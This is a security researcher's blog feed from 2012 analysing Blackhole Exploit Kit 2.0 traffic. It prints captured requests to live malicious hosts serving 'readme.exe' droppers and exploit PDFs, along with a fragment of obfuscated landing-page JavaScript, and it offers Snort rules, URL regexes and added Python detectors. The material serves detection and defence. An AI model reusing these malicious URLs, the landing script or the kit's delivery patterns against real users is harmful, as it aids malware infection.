Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />
Connection: keep-alive</blockquote>
<br />
<blockquote>
HTTP/1.1 200 OK<br />
Server: nginx/1.0.10<br />
Date: Sun, 07 Oct 2012 05:09:02 GMT<br />
Content-Type: application/x-msdownload<br />
Connection: keep-alive<br />
X-Powered-By: PHP/5.3.17-1~dotdeb.0<br />
Pragma: public<br />
Expires: Sun, 07 Oct 2012 12:42:41 GMT<br />
Cache-Control: must-revalidate, post-check=0, pre-check=0<br />
Cache-Control: private<br />
Content-Disposition: attachment; filename="readme.exe"<br />
Content-Transfer-Encoding: binary<br />
Content-Length: 92160</blockquote>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Next example</span></b><br />
<br />
<blockquote>
GET /links/observe_resources-film.php?gf=050934030b&fe=0a050304380b37370a36&c=02&pr=n&od=v HTTP/1.1<br />
User-Agent: Java/1.6.0_29<br />
Host: corandomotorider.com<br />
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />
Connection: keep-alive </blockquote>
<br />
<blockquote>
HTTP/1.1 200 OK<br />
Server: nginx/0.8.54<br />
Date: Sat, 20 Oct 2012 23:17:50 GMT<br />
Content-Type: application/x-msdownload<br />
Connection: keep-alive<br />
Content-Length: 444494<br />
X-Powered-By: PHP/5.3.14-1~dotdeb.0<br />
Pragma: public<br />
Expires: Sat, 20 Oct 2012 23:17:50 GMT<br />
Cache-Control: must-revalidate, post-check=0, pre-check=0<br />
Cache-Control: private<br />
Content-Disposition: attachment; filename="readme.exe"<br />
Content-Transfer-Encoding: binary</blockquote>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Next example</span></b><br />
<br />
<blockquote class="tr_bq">
GET /links/keyboard_aid_feeds.php?mf=050934030b&ue=0506050a0b0934070b06&h=02&jx=b&tj=k HTTP/1.1<br />
User-Agent: Java/1.6.0_29<br />
Host: postpozic.8x.biz<br />
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />
Connection: keep-alive </blockquote>
<br />
<blockquote class="tr_bq">
HTTP/1.1 200 OK<br />
Server: nginx/1.2.4<br />
Date: Sat, 20 Oct 2012 23:24:20 GMT<br />
Content-Type: application/x-msdownload<br />
Content-Length: 368640<br />
Connection: keep-alive<br />
Pragma: public<br />
Expires: Sat, 20 Oct 2012 23:23:24 GMT<br />
Cache-Control: must-revalidate, post-check=0, pre-check=0<br />
Cache-Control: private<br />
Content-Disposition: attachment; filename="about.exe"<br />
Content-Transfer-Encoding: binary</blockquote>
<br />
<b><span style="font-family: Arial, Helvetica, sans-serif;">Next example</span></b><br />
<br />
<blockquote class="tr_bq">
GET /links/around_film.php?rf=050934030b&le=08040534050337333736&x=02&qb=o&zt=h HTTP/1.1<br />
User-Agent: Java/1.6.0_29<br />
Host: 94.23.43.55<br />
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />
Connection: keep-alive</blockquote>
<br />
<blockquote class="tr_bq">
HTTP/1.1 200 OK<br />
Server: nginx<br />
Date: Sun, 21 Oct 2012 00:31:48 GMT<br />
Content-Type: application/x-msdownload<br />
Content-Length: 73326<br />
Connection: keep-alive<br />
X-Powered-By: PHP/5.3.10-1ubuntu3.2<br />
Pragma: public<br />
Expires: Sun, 21 Oct 2012 00:31:48 GMT<br />
Cache-Control: must-revalidate, post-check=0, pre-check=0<br />
Cache-Control: private<br />
Content-Disposition: attachment; filename="readme.exe"<br />
Content-Transfer-Encoding: binary</blockquote>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Next example</span></b><br />
<br />
<blockquote class="tr_bq">
GET /forum/links/column.php?ff=050934030b&we=3307093738070736060b&q=02&jn=p&ep=g HTTP/1.1<br />
User-Agent: Java/1.6.0_29<br />
Host: secondhand4u.ru:8080<br />
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />
Connection: keep-alive</blockquote>
<br />
<blockquote class="tr_bq">
HTTP/1.1 200 OK<br />
Server: nginx/1.0.10<br />
Date: Sun, 21 Oct 2012 00:54:11 GMT<br />
Content-Type: application/x-msdownload<br />
Connection: keep-alive<br />
X-Powered-By: PHP/5.3.17-1~dotdeb.0<br />
Pragma: public<br />
Expires: Sun, 21 Oct 2012 00:52:37 GMT<br />
Cache-Control: must-revalidate, post-check=0, pre-check=0<br />
Cache-Control: private<br />
Content-Disposition: attachment; filename="readme.exe"<br />
Content-Transfer-Encoding: binary<br />
Content-Length: 87040</blockquote>
<h3>
<span style="font-family: Arial, Helvetica, sans-serif;">Conclusion</span></h3>
<span style="font-family: Arial, Helvetica, sans-serif;">In conclusion, I hope that you can use this information to combat this exploit kit. As always, I welcome suggestions, feedback and teamwork.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Possible snort rules (I'm still testing these).</span><br />
<br />
<pre class="dualColTextStyle" hasbox="2">alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Blackhole 2.0 Binary Get Request"; content:"GET"; offset:0; content:"User-Agent: Java/1.6"; content:!"Referer"; pcre:"/\.php\?\w\w\=[a-f0-9]{10}\&\w\w\=[a-f0-9]{20}\&\w\=[0-9]{2}\&\w\w\=\w\&\w\w\=\w$/U"; classtype:successful-user; sid:98800058;)</pre>
<pre class="dualColTextStyle" hasbox="2">alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Blackhole 2.0 binary download"; content:"HTTP/1"; content:"Content-Type: application/x-msdownload"; content:"Content-Disposition: attachment|3b| filename="; distance:0; content:"Content-Transfer-Encoding: binary"; distance:0; nocase; pcre:"/filename\=\"(readme\.exe|info\.exe|about\.exe)/smi"; classtype:successful-user; sid:98800059;)</pre>
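Added example (not part of the original post, and not a replacement for the Snort rules): the same request and response checks expressed in Python so they can be run over captured HTTP headers, for instance from proxy logs. The function names and verdict strings are assumptions for this example. The first sample pair is copied from the post's first capture; the other two are constructed.<br />

```python
import re

# URI regex and header checks follow the post's two Snort rules above.
URI_RE = re.compile(
    r"\.php\?\w\w\=[a-f0-9]{10}\&\w\w\=[a-f0-9]{20}\&\w\=[0-9]{2}"
    r"\&\w\w\=\w\&\w\w\=\w$")
DROP_NAMES = {"readme.exe", "info.exe", "about.exe"}
REQUEST_RULE = {"uri_regex", "java_user_agent", "no_referer"}
RESPONSE_RULE = {"x_msdownload", "dropper_filename", "binary_transfer_encoding"}


def parse_head(raw):
    """Return (start line, {lower-cased header name: [values]})."""
    lines = [ln.strip() for ln in raw.strip().splitlines() if ln.strip()]
    if not lines:
        return "", {}
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def request_indicators(raw):
    """Indicators from the request: URI regex, Java user agent, no Referer."""
    start, headers = parse_head(raw)
    parts = start.split()
    hits = set()
    if len(parts) >= 2 and parts[0] == "GET" and URI_RE.search(parts[1]):
        hits.add("uri_regex")
    if any(ua.startswith("Java/") for ua in headers.get("user-agent", [])):
        hits.add("java_user_agent")
    if "referer" not in headers:
        hits.add("no_referer")
    return hits


def response_indicators(raw):
    """Indicators from the response headers listed under 'The Response'."""
    _, headers = parse_head(raw)
    hits = set()
    types = [v.split(";")[0].strip().lower()
             for v in headers.get("content-type", [])]
    if "application/x-msdownload" in types:
        hits.add("x_msdownload")
    for value in headers.get("content-disposition", []):
        m = re.match(r'attachment;\s*filename="?([^";]+)', value, re.I)
        if m and m.group(1).strip().lower() in DROP_NAMES:
            hits.add("dropper_filename")
    encodings = [v.lower() for v in headers.get("content-transfer-encoding", [])]
    if "binary" in encodings:
        hits.add("binary_transfer_encoding")
    return hits


def classify(request, response):
    """Require every indicator of a rule, as the Snort rules do."""
    req = request_indicators(request) >= REQUEST_RULE
    resp = response_indicators(response) >= RESPONSE_RULE
    if req and resp:
        return "binary-get+download"
    if req:
        return "binary-get"
    if resp:
        return "binary-download"
    return "no-match"


# Copied from the first capture in the post.
BHEK_REQUEST = """GET /forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m HTTP/1.1
User-Agent: Java/1.6.0_29
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive"""
BHEK_RESPONSE = """HTTP/1.1 200 OK
Server: nginx/1.0.10
Content-Type: application/x-msdownload
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 92160"""
# Constructed: a browser download with a Referer and a different file name.
BROWSER_REQUEST = """GET /downloads/get.php?file=setup&ver=12 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: http://example.com/downloads/
Host: example.com"""
BROWSER_RESPONSE = """HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Disposition: attachment; filename="setup.exe"
Content-Transfer-Encoding: binary"""
# Constructed: a Java client with no Referer but an unrelated URI.
JAVA_REQUEST = """GET /update/check.php?v=7&build=29 HTTP/1.1
User-Agent: Java/1.6.0_29
Host: example.com"""

if __name__ == "__main__":
    print(classify(BHEK_REQUEST, BHEK_RESPONSE))
    print(classify(BROWSER_REQUEST, BROWSER_RESPONSE))
    print(classify(JAVA_REQUEST, BROWSER_RESPONSE))
```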
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Arial, Helvetica, sans-serif; font-size: large;">Shout out to @malwaremustdie and the #malwaremustdie team.</span></pre>
<br />
<h2>
Blackhole Exploit Kit v 2.0 URL Pattern Analysis</h2>
Written by: Frank Angiolelli, CISSP. Published 2012-10-14, updated 2012-10-15.<br />
<br />
<b>UPDATE: 10/15/2012</b><br />
<b>Due to the high number of FPs from facebook, the regex is now tighter.</b><br />
<br />
Continuing my series on URL patterns in exploit kits, the one I am focused on right now is Blackhole Exploit Kit 2.0, and its URL structure follows a predictable pattern. <a href="http://fortknoxnetworks.blogspot.com/2012/10/url-patterns-emerging-in-new-threats.html" target="_blank">The pattern I identified in this post</a> appears to be BHEK 2.0. This is a running series where I am posting my intel as I go.<br />
<br />
<br />
<b>\.php\?\w{2,10}\=[0-9a-f]{10}\&\w{2,10}\=[a-z0-9]{2,6}\&[a-z]{2,8}\=[a-z]{2,10}\&[a-z]{2,8}\=[a-z]{2,8}$</b><br />
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiohJ3vNNxypXl17Hxs-LzErq8xM1VSpbm2qYgXyTGGsv0BzvIDJ_F05xv8GSnvl5ra26sh1u6z0h060-wvbnj5CICMotOQ4Q6zJleM3Su_PNDaV9H8xlh2WjeLvbvlAGD1odLp1iKDmnE/s1600/regex.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="114" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiohJ3vNNxypXl17Hxs-LzErq8xM1VSpbm2qYgXyTGGsv0BzvIDJ_F05xv8GSnvl5ra26sh1u6z0h060-wvbnj5CICMotOQ4Q6zJleM3Su_PNDaV9H8xlh2WjeLvbvlAGD1odLp1iKDmnE/s320/regex.PNG" width="320" /></a></div>
<b><br /></b>
<br />
While some of the patterns I have investigated contain more than 10 hex characters in the first parameter (in 10 character increments), the majority of these have exactly 10. If you observe this hitting false positives, please leave a comment below.<br />
<br />
Some of the interesting patterns that I have discovered here are:<br />
<br />
<ol>
<li>The initial point of contact contains an applet archive</li>
<li>The initial get request response has the following at offset 0 "&lt;html&gt;&lt;head&gt;&lt;title&gt;&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;div dqa="asd"&gt;"</li>
<li>The response contains try, catch, try, catch, but towards the end.</li>
<li>The second and subsequent URLs (GET Requests) are a consistent match to the regex pattern above</li>
<li>In all cases I have observed, the exploit sent was a PDF with 5 letters in the name (random name).</li>
<li>The PDFs are served with "Content-Disposition: inline; filename="</li>
<li>"/Index[5 1 7 1 9 4 23 4 50 " is a good layer 7 IOC in the response packets for the PDF exploit.</li>
<li>I have observed two different-sized PDFs; I am not sure of the differences at this time.</li>
</ol>
<br />
<b>Request:</b><br />
<br />
GET /links/rules_familiar-occurred.php HTTP/1.1<br />
Accept: */*<br />
Accept-Language: en-us<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)<br />
Accept-Encoding: gzip, deflate<br />
Host: 173.246.101.197<br />
Connection: Keep-Alive<br />
<br />
<b>Response:</b><br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx/0.7.67<br />
Date: Sun, 14 Oct 2012 19:52:42 GMT<br />
Content-Type: text/html<br />
Transfer-Encoding: chunked<br />
Connection: keep-alive<br />
X-Powered-By: PHP/5.3.14-1~dotdeb.0<br />
<br />
509<br />
<br />
&lt;html&gt;&lt;head&gt;&lt;title&gt;&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;div dqa="asd"&gt;&lt;/div&gt;&lt;applet archive="http://173.246.101.197/links/rules_familiar-occurred.php?cjqj=0735020b0b&zwjw=4447&pdfvomu=jpjhbwls&snguplp=nvqz" code="vwqfqwfea"&gt;&lt;param name="&#00117;&#105;&#100;" value=' &lt; REALLY LONG VALUE&gt;<br />
<br />
&lt;/u&gt;&lt;script&gt;<br />
<br />
if(020==0x10)d=document;<br />
try{fsdsb^32}catch(gdsgsd){try{(d+"523")()}catch(dsgdsg){a=d[g](ggg);}}<br />
s="";<br />
for(i=0;;i++){<br />
.window.asd2();<br />
.if(r){s=s+r;}else break;<br />
}<br />
a=s;<br />
s="";<br />
k="";<br />
asd3();<br />
qa=0x1d;<br />
for(i=0;i&lt;a.length;i+=2){<br />
.s+=ss(p(a[sss](i,2),qa));<br />
<br />
<br />
if(021==0x11)asd();<br />
<br />
..&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;<br />
<br />
0<br />
<br />
<br />
<b>Request:</b><br />
<br />
GET /links/rules_familiar-occurred.php?bklx=0735020b0b&wgaxj=43&qrfjyn=33090b0b0304080b0336&chxyb=02000200020002 HTTP/1.1<br />
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*<br />
Referer: http://173.246.101.197/links/rules_familiar-occurred.php<br />
Accept-Language: en-us<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)<br />
Accept-Encoding: gzip, deflate<br />
Host: 173.246.101.197<br />
Connection: Keep-Alive<br />
<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx/0.7.67<br />
Date: Sun, 14 Oct 2012 19:52:47 GMT<br />
Content-Type: application/pdf<br />
Connection: keep-alive<br />
Content-Length: 13388<br />
X-Powered-By: PHP/5.3.14-1~dotdeb.0<br />
Accept-Ranges: bytes<br />
Content-Disposition: inline; filename=2a34b.pdf<br />
<br />
<br />
<br />
%PDF-1.6<br />
%....<br />
<br />
52 0 obj&lt;&lt;/Length 4321/Root 1 0 R/Info 3 0 R/Filter/FlateDecode/W[1 2 1]/Index[5 1 7 1 9 4 23 4 50 3]&gt;&gt;stream<br />
<br />
x.bbb0b`b```.G0.....!...w.310Z...2....w...<br />
<br />
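Added example (not part of the original post): a Python sketch that checks a landing page body and a PDF response for the indicators listed above. The function names and indicator labels are assumptions for this example, the sample inputs are constructed from the captures in this post (the long param value is replaced by filler), and the file name check accepts 5 letters or digits to cover the 2a34b.pdf seen in the capture.<br />

```python
import re

# Entry point regex from this post (the tightened 10/15/2012 version).
ENTRY_URL = re.compile(
    r"\.php\?\w{2,10}\=[0-9a-f]{10}\&\w{2,10}\=[a-z0-9]{2,6}"
    r"\&[a-z]{2,8}\=[a-z]{2,10}\&[a-z]{2,8}\=[a-z]{2,8}$")
LANDING_PREFIX = '<html><head><title></title></head><body><div dqa="asd">'
PDF_INDEX_MARKER = b"/Index[5 1 7 1 9 4 23 4 50 "
APPLET_ARCHIVE = re.compile(r'<applet\s+archive="([^"]+)"', re.I)
TRY_CATCH_CHAIN = re.compile(
    r"try\s*\{.*?catch\s*\(.*?try\s*\{.*?catch\s*\(", re.S)
PDF_NAME = re.compile(r'inline;\s*filename="?[0-9a-z]{5}\.pdf"?$', re.I)


def landing_indicators(body):
    """Check a landing page body (str) for list items 1 to 3 above."""
    hits = []
    if body.startswith(LANDING_PREFIX):
        hits.append("prefix_at_offset_0")
    applet = APPLET_ARCHIVE.search(body)
    if applet and ENTRY_URL.search(applet.group(1)):
        hits.append("applet_archive_matches_regex")
    chain = TRY_CATCH_CHAIN.search(body)
    # "towards the end" is approximated here as the second half of the body.
    if chain and chain.start() > len(body) // 2:
        hits.append("try_catch_chain_near_end")
    return hits


def pdf_indicators(headers, body):
    """headers: {lower-cased name: value}; body: raw response bytes."""
    hits = []
    if headers.get("content-type", "").lower() == "application/pdf":
        hits.append("pdf_content_type")
    if PDF_NAME.search(headers.get("content-disposition", "")):
        hits.append("inline_five_char_name")
    if PDF_INDEX_MARKER in body:
        hits.append("index_marker")
    return hits


# Constructed from the landing response in this post; filler replaces the
# long param value that the post elides.
LANDING = (
    '<html><head><title></title></head><body><div dqa="asd"></div>'
    '<applet archive="http://173.246.101.197/links/rules_familiar-occurred.php'
    '?cjqj=0735020b0b&zwjw=4447&pdfvomu=jpjhbwls&snguplp=nvqz" '
    'code="vwqfqwfea"><param name="uid" value="' + "0" * 600 + '"/></applet>'
    '<script>try{fsdsb^32}catch(gdsgsd){try{(d+"523")()}catch(dsgdsg){}}'
    '</script></body></html>')
# Constructed benign page that also embeds an applet.
BENIGN_PAGE = (
    '<html><head><title>Downloads</title></head><body>'
    '<applet archive="http://example.com/app.jar" code="Main"></applet>'
    '</body></html>')
# Headers and first bytes of the PDF response shown in this post.
PDF_HEADERS = {"content-type": "application/pdf",
               "content-disposition": "inline; filename=2a34b.pdf"}
PDF_BODY = (b"%PDF-1.6\n52 0 obj<</Length 4321/Root 1 0 R/Info 3 0 R"
            b"/Filter/FlateDecode/W[1 2 1]/Index[5 1 7 1 9 4 23 4 50 3]>>stream\n")
# Constructed benign PDF response.
BENIGN_PDF_HEADERS = {"content-type": "application/pdf",
                      "content-disposition": "inline; filename=annual-report.pdf"}
BENIGN_PDF_BODY = b"%PDF-1.4\n7 0 obj<</Type/XRef/W[1 2 1]/Index[0 10]>>stream\n"

if __name__ == "__main__":
    print(landing_indicators(LANDING))
    print(landing_indicators(BENIGN_PAGE))
    print(pdf_indicators(PDF_HEADERS, PDF_BODY))
    print(pdf_indicators(BENIGN_PDF_HEADERS, BENIGN_PDF_BODY))
```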
<br />
<b><br /></b>
<b>References:</b><br />
<a href="http://jsunpack.jeek.org/dec/go?report=77b050856d601de7dd7df086d4cf2c03d5043464">http://jsunpack.jeek.org/dec/go?report=77b050856d601de7dd7df086d4cf2c03d5043464</a><br />
<a href="http://securityanalyst.co/blackhole-2-0-exploit-kit-pcap-download-wireshark-tcpdump-traffic-analysis/">http://securityanalyst.co/blackhole-2-0-exploit-kit-pcap-download-wireshark-tcpdump-traffic-analysis/</a><br />
<a href="http://fortknoxnetworks.blogspot.com/2012/10/url-patterns-emerging-in-new-threats.html">http://fortknoxnetworks.blogspot.com/2012/10/url-patterns-emerging-in-new-threats.html</a><br />
<a href="http://jsunpack.jeek.org/dec/go?report=43231d144a88024f6a4bdb6a890c7d51148cfae2">http://jsunpack.jeek.org/dec/go?report=43231d144a88024f6a4bdb6a890c7d51148cfae2</a><br />
<a href="http://labs.vericon.li/2012/10/exploitjsblacole-gb-infection-explained-with-source-code/">http://labs.vericon.li/2012/10/exploitjsblacole-gb-infection-explained-with-source-code/</a><br />
<a href="http://jsunpack.jeek.org/?report=bcf3b47db058c9a6406ca55e1758d0c01790683b">http://jsunpack.jeek.org/?report=bcf3b47db058c9a6406ca55e1758d0c01790683b</a><br />
<a href="http://pastebin.com/iCfC5kzY">http://pastebin.com/iCfC5kzY</a> (Credit to @MALWAREMUSTDIE)<br />
<a href="http://jsunpack.jeek.org/dec/go?report=8ec366564ae09ff7488554fffc03ad518fb5c591">http://jsunpack.jeek.org/dec/go?report=8ec366564ae09ff7488554fffc03ad518fb5c591</a><br />
<br />
<br />Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-79522728013850379612012-10-07T11:56:00.000-07:002012-10-07T14:48:17.663-07:00URL Patterns Emerging in New Threats.<span style="font-size: x-small;">Written by Frank Angiolelli, CISSP</span><br />
<br />
I continue my analysis of exploit URLs and disk artifacts. This website was reported as a Blackhole exploit, but some aspects of the network traffic are consistent with Neosploit, including the user agent strings involved.<br />
<br />
In this case, I grabbed the following exploit URL.<br />
<span style="font-family: Courier New, Courier, monospace;">hxxp://www.i-democracy.ru/letter.htm</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjOczo4qwcG85JteJNu7R_Qkt1SzCLVvZ7znw3LVXhxjpM2lKLDbU8hyphenhyphenUxSUrwJlBtLFLDTN1kXK_aB0NKXOcVIVUNohQzPF2_aNeqM2egj7lxrHAwMGs6f9JW81EM4m2sPwWxQuU5MXI/s1600/wepawet.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjOczo4qwcG85JteJNu7R_Qkt1SzCLVvZ7znw3LVXhxjpM2lKLDbU8hyphenhyphenUxSUrwJlBtLFLDTN1kXK_aB0NKXOcVIVUNohQzPF2_aNeqM2egj7lxrHAwMGs6f9JW81EM4m2sPwWxQuU5MXI/s640/wepawet.PNG" width="640" /></a></div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv4zhB13NUaKY-L02_K87og1saBBub6acV96h-oVr0hfDeFEZlGo_NwW64SM67goCT_fBnFzqqpRHOLqcDSCAHOlOuVCDfPf-q6TiyaxIC0X8_3QopFnqzcm1NHAWJ17rOtGw7SlAWmC0/s1600/jsunpack-idemocracy.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv4zhB13NUaKY-L02_K87og1saBBub6acV96h-oVr0hfDeFEZlGo_NwW64SM67goCT_fBnFzqqpRHOLqcDSCAHOlOuVCDfPf-q6TiyaxIC0X8_3QopFnqzcm1NHAWJ17rOtGw7SlAWmC0/s640/jsunpack-idemocracy.PNG" width="640" /></a></div>
<span style="font-family: inherit;">Once my sandbox got hit, I started to notice some patterns from all these attacks, remembering back to the <a href="http://fortknoxnetworks.blogspot.com/2012/09/new-fake-av-strain-url-callbacks.html" target="_blank">FakeAV infection I looked at September 15th.</a> Deeper inspection shows what looks like a usable pattern. </span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">First, in my infection the dialect of the exploit kit was very similar in pattern to the infection method of the FakeAV and matched other traffic observed. </span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6Rje7OplQS7TIgJg3X9TBt-z8kSs2SW3SBOz-hcBsHjKQklo-EvtT2FC4mKSq0jQggKgfLtD1qPbwjjijt8xG7nu-Keo2w6lPKz6A_vHY3FyTNE9BM9zlgraQUd6kTEShmRUnAPvwz-M/s1600/screencap.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6Rje7OplQS7TIgJg3X9TBt-z8kSs2SW3SBOz-hcBsHjKQklo-EvtT2FC4mKSq0jQggKgfLtD1qPbwjjijt8xG7nu-Keo2w6lPKz6A_vHY3FyTNE9BM9zlgraQUd6kTEShmRUnAPvwz-M/s200/screencap.PNG" width="200" /></a></div>
<br />
<br />
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Courier New, Courier, monospace;"><b>GET /forum/links/column.php?boaz=0735020b0b&zpjqh=3f38&yztospu=evicnt&utkfuo=ijdxvx</b> </span></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Courier New, Courier, monospace;">HTTP/1.1
accept-encoding: pack200-gzip, gzip
<b>content-type: application/x-java-archive</b>
<b>User-Agent: <a href="http://user-agent-string.info/?Fuas=Mozilla%2F4.0+(Windows+XP+5.1)+Java%2F1.6.0_29&test=7823&action=analyze" target="_blank">Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29</a></b>
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive</span></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Courier New, Courier, monospace;"><b>GET /forum/links/column.php?boaz=0735020b0b&zpjqh=3f38&yztospu=evicnt&utkfuo=ijdxvx HTTP/1.1</b>
accept-encoding: pack200-gzip,gzip
<b>User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29</b>
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
</span></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Courier New, Courier, monospace;"><b>GET /forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m</b>
HTTP/1.1
<b>User-Agent: Java/1.6.0_29</b>
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive</span></pre>
<br />
<br />
Notice the difference in the User-Agent between requests, and the Content-Type header on the initial request, which is missing from the subsequent requests. The initial user agent string is consistent with observed Neosploit, and the binary download is consistent with Java exploits, where the user agent string is straight Java.<br />
<br />
<h4>
Exploit Kit Sends PDF Despite Other Exploits Available</h4>
What was also of interest is that this sandbox has multiple exploits available, but unlike the blackhole I analyzed on September 9th (where Media Player was exploited), this exploit kit sent a PDF file.<br />
<br />
Next, I noticed the PDF served as an inline attachment by an nginx server. Also, see this <a href="http://urlquery.net/report.php?id=197377" target="_blank">URLquery report</a>.<br />
<br />
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"><b>GET /forum/links/column.php?zbyg=0735020b0b&dcgdi=4b&ayj=3307093738070736060b&okn=02000200020002</b> HTTP/1.1</span><br />
<span style="font-family: Courier New, Courier, monospace;">Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*</span><br />
<span style="font-family: Courier New, Courier, monospace;">Referer: http://sonatanamore.ru:8080/forum/links/column.php</span><br />
<span style="font-family: Courier New, Courier, monospace;">Accept-Language: en-us</span><br />
<span style="font-family: Courier New, Courier, monospace;">User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)</span><br />
<span style="font-family: Courier New, Courier, monospace;">Accept-Encoding: gzip, deflate</span><br />
<span style="font-family: Courier New, Courier, monospace;">Host: sonatanamore.ru:8080</span><br />
<span style="font-family: Courier New, Courier, monospace;">Connection: Keep-Alive</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">HTTP/1.1 200 OK</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>Server: nginx/1.0.10</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Date: Sun, 07 Oct 2012 05:08:50 GMT</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>Content-Type: application/pdf</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Connection: keep-alive</span><br />
<span style="font-family: Courier New, Courier, monospace;">X-Powered-By: PHP/5.3.17-1~dotdeb.0</span><br />
<span style="font-family: Courier New, Courier, monospace;">Accept-Ranges: bytes</span><br />
<span style="font-family: Courier New, Courier, monospace;">Content-Length: 13581</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>Content-Disposition: inline; filename=a17ee.pdf</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">%PDF-1.6</span><br />
<span style="font-family: Courier New, Courier, monospace;">%....</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">52 0 obj<</Length 12345/Root 1 0 R/Info 3 0 R/Filter/FlateDecode/W[1 2 1]/Index[5 1 7 1 9 4 23 4 50 3]>>stream</span><br />
<br />
<span style="font-family: inherit;">This was immediately followed by the binary download, requested by Java 6 Update 29 (User-Agent: Java/1.6.0_29).</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<span style="font-family: Courier New, Courier, monospace;"><b>GET /forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m</b> HTTP/1.1</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>User-Agent: Java/1.6.0_29</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Host: sonatanamore.ru:8080</span><br />
<span style="font-family: Courier New, Courier, monospace;">Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2</span><br />
<span style="font-family: Courier New, Courier, monospace;">Connection: keep-alive</span><br />
